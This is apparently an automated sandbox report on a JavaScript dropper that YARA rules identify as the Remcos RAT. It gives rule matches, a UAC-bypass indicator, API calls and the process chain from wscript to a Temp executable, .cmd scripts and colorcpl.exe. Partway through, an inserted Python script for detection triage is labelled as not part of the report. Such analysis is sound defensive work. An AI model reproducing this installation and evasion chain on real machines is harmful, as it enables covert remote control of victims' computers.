Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_030421C0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_030281D7
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0303E1E0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0302809D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0303774C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_030325A1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0303E43D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03053472
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0302747E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0304DAD9
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_030379F6
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_030279F5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0301F809
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03035F52
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03037F78
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0303DFB1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0303DD82
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03033C73
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03013CA0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03037CBD
Source: C:\Users\user\Links\Ekbmajrx.PIF | Code function: String function: 02973E20 appears 48 times
Source: C:\Users\user\Links\Ekbmajrx.PIF | Code function: String function: 02964414 appears 154 times
Source: C:\Users\user\Links\Ekbmajrx.PIF | Code function: String function: 0296457C appears 570 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02903E9C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02927687 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 028F457C appears 835 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 028F421C appears 64 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02903E20 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 028F4414 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 0295A750 appears 46 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 02E01F96 appears 49 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 030351E0 appears 55 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 03001F96 appears 49 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 02E351E0 appears 55 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 02E34ACF appears 43 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 02E01EBF appears 31 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 03002117 appears 39 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 03034ACF appears 43 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 03001EBF appears 31 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 02E02117 appears 45 times
Source: 6732832.js | Initial sample: Strings found which are bigger than 50
Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winJS@19/7@0/1
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E17AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_02E17AD9
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03017AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,16_2_03017AD9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F793C GetDiskFreeSpaceA,3_2_028F793C
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_02E0C03C
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1B9AB FindResourceA,LoadResource,LockResource,SizeofResource,8_2_02E1B9AB
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1AE6B OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_02E1AE6B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\All Users\6770.cmdJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
                      Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 6732832.jsVirustotal: Detection: 47%
                      Source: 6732832.jsReversingLabs: Detection: 41%
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: unknown Process created: C:\Users\user\Links\Ekbmajrx.PIF "C:\Users\user\Links\Ekbmajrx.PIF"
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: unknown Process created: C:\Users\user\Links\Ekbmajrx.PIF "C:\Users\user\Links\Ekbmajrx.PIF"
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd""
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
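The process chain listed above (wscript.exe writing x.exe to %TEMP% and starting it, x.exe running .cmd files out of C:\Users\All Users and spawning colorcpl.exe, and a .PIF in the user's Links folder spawning colorcpl.exe again) is the parent/child structure an endpoint detection keys on. The following is an added example and not part of the Joe Sandbox report: a small Python triage over Sysmon-style process-creation records. The records are constructed from the command lines listed above; the field names (Image, ParentImage, CommandLine) and the list of parents from which colorcpl.exe is normally launched are assumptions.

```python
import ntpath

# Constructed from the "Process created" lines above (Sysmon Event ID 1 field
# names are an assumption about the log source). The last record is a benign
# control: colorcpl.exe launched from the Control Panel by explorer.exe.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\x.exe"'},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""'},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "Image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "CommandLine": r"C:\Windows\System32\colorcpl.exe"},
    {"ParentImage": r"C:\Users\user\Links\Ekbmajrx.PIF",
     "Image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "CommandLine": r"C:\Windows\System32\colorcpl.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\colorcpl.exe",
     "CommandLine": r"C:\Windows\System32\colorcpl.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Extensions Windows runs as PE executables although they do not look like one.
DISGUISED_EXE_EXT = (".pif", ".scr", ".com")
# Assumed set of parents from which colorcpl.exe is normally started.
COLORCPL_EXPECTED_PARENTS = {"explorer.exe", "control.exe", "rundll32.exe", "systemsettings.exe"}
USER_PROFILE_PREFIX = "c:\\users\\"
# "All Users" is the legacy junction to ProgramData; treat both spellings alike.
PROGRAMDATA_MARKERS = ("\\users\\all users\\", "\\programdata\\")


def _norm(path: str) -> str:
    # The report shows backslashes doubled inside the cmd.exe command line.
    return path.replace("\\\\", "\\").lower()


def classify(ev: dict) -> list:
    """Return the names of every rule the record trips (empty list if none)."""
    parent_path = _norm(ev["ParentImage"])
    image_path = _norm(ev["Image"])
    cmd = _norm(ev.get("CommandLine", ""))
    parent = ntpath.basename(parent_path)
    image = ntpath.basename(image_path)
    hits = []
    if parent in SCRIPT_HOSTS and image.endswith(".exe") and image_path.startswith(USER_PROFILE_PREFIX):
        hits.append("script_host_dropped_exe")
    if parent.endswith(DISGUISED_EXE_EXT) and parent_path.startswith(USER_PROFILE_PREFIX):
        hits.append("parent_with_disguised_extension")
    if image == "colorcpl.exe" and parent not in COLORCPL_EXPECTED_PARENTS:
        hits.append("colorcpl_unusual_parent")
    if (image == "cmd.exe" and " /c " in cmd
            and cmd.rstrip('"').endswith((".cmd", ".bat"))
            and any(m in cmd for m in PROGRAMDATA_MARKERS)):
        hits.append("cmd_runs_script_from_programdata")
    return hits


def triage(events: list) -> list:
    """Return only the flagged records, each with its rule names attached."""
    out = []
    for ev in events:
        hits = classify(ev)
        if hits:
            out.append({"Image": ev["Image"], "ParentImage": ev["ParentImage"], "rules": hits})
    return out


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row["ParentImage"], "->", row["Image"], row["rules"])
```

The PIF-parent rule fires together with the colorcpl rule on the same record, which is the point: a single colorcpl.exe launch from an odd parent is weak evidence on its own, but a disguised-extension parent in the user profile plus an unusual colorcpl.exe child is the combination seen in this chain.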
                      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
